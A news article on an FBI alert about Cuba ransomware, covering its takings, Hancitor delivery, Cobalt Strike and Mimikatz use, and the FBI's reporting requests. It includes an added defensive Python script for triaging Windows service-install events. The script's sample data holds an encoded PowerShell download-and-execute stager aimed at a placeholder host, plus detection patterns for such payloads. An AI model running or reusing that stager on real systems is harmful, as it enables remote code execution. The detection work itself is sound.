The threat actors behind the Cuba ransomware variant have now amassed $44m by targeting at least 49 victims, according to the FBI.
The bureau’s latest ‘flash’ alert revealed that the group had demanded at least $74m from its victims. These victims often come from critical infrastructure sectors such as financial, government, healthcare, manufacturing, and IT.
“Cuba ransomware is distributed through Hancitor malware, a loader known for dropping or executing stealers, such as Remote Access Trojans (RATs) and other types of ransomware, onto victims’ networks,” the FBI explained.
“Hancitor malware actors use phishing emails, Microsoft Exchange vulnerabilities, compromised credentials, or legitimate Remote Desktop Protocol (RDP) tools to gain initial access to a victim’s network. Subsequently, Cuba ransomware actors use legitimate Windows services — such as PowerShell, PsExec, and other unspecified services — and then leverage Windows admin privileges to execute their ransomware and other processes remotely.”
Following a compromise, the ransomware will install and execute a CobaltStrike beacon as a service on the victim’s network via PowerShell. It also uses Mimikatz malware to steal RDP credentials and hijack user accounts, the report claimed.
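The service-install step described above is something defenders can look for in the Windows System log (Event ID 7045, “A service was installed in the system”). The following triage routine is an added example, not code from the article or the FBI alert; the event records, service names and URL it operates on are constructed placeholders, and the switch and stager patterns it matches are the generic ones used in published detection rules rather than anything specific to the Cuba operators.

```python
import base64
import re

# Constructed sample records in the shape of Windows System-log Event ID 7045
# ("A service was installed in the system"), flattened to the two fields that
# matter here. Real records would come from the event log or a SIEM.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a')"
    .encode("utf-16le")).decode()
SAMPLE_7045 = [
    {"ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"ServiceName": "a1b2c3d", "ImagePath": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"ServiceName": "PSEXESVC", "ImagePath": r"C:\Windows\PSEXESVC.exe"},
]

# Switches typical of PowerShell launched non-interactively to run a hidden,
# encoded payload: -nop/-noprofile, -w hidden, -e/-ec/-enc/-EncodedCommand.
SWITCHES = re.compile(r"-(?:nop|noprofile|w(?:indowstyle)?\s+hidden|e(?:c|nc|ncodedcommand)?)\b", re.I)
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Strings that commonly appear in a decoded stager (in-memory execution, download).
STAGER_MARKERS = ("IEX", "Invoke-Expression", "DownloadString", "FromBase64String")


def decode_encoded_command(image_path: str):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = ENCODED_ARG.search(image_path)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_service_installs(records):
    """Flag 7045 records whose ImagePath is a PowerShell-launched payload or a PsExec
    service. Returns one finding per flagged record with the reasons and decoded text."""
    findings = []
    for rec in records:
        path, reasons = rec["ImagePath"], []
        if re.search(r"powershell(?:\.exe)?", path, re.I):
            reasons.append("powershell as service binary")
            reasons += [f"switch {s.group(0)}" for s in SWITCHES.finditer(path)]
        decoded = decode_encoded_command(path)
        if decoded:
            reasons += [f"decoded payload contains {k}" for k in STAGER_MARKERS
                        if k.lower() in decoded.lower()]
        if rec["ServiceName"].upper() == "PSEXESVC":
            reasons.append("PsExec service install (legitimate tool; confirm who ran it)")
        if reasons:
            findings.append({"ServiceName": rec["ServiceName"], "reasons": reasons, "decoded": decoded})
    return findings
```

Running `triage_service_installs(SAMPLE_7045)` flags the encoded PowerShell service and the PsExec service while leaving the genuine spooler alone; the decoded payload is returned so an analyst can read it rather than the base64 blob.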
The FBI took a notably softer line in the alert on organizations that go against its advice and pay their extorters. The bureau said it “understands” if corporate victims have to engage with their attackers in order to protect shareholders, customers and employees.
However, it urged companies to report any incidents to the FBI, even if they do pay up, as this provides invaluable information to prevent future attacks and enable tracking of key groups.
“The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, Bitcoin wallet information, the decryptor file, and/or a benign sample of an encrypted file,” it said of the Cuba variant.
Cuba is believed to have been active since January 2020.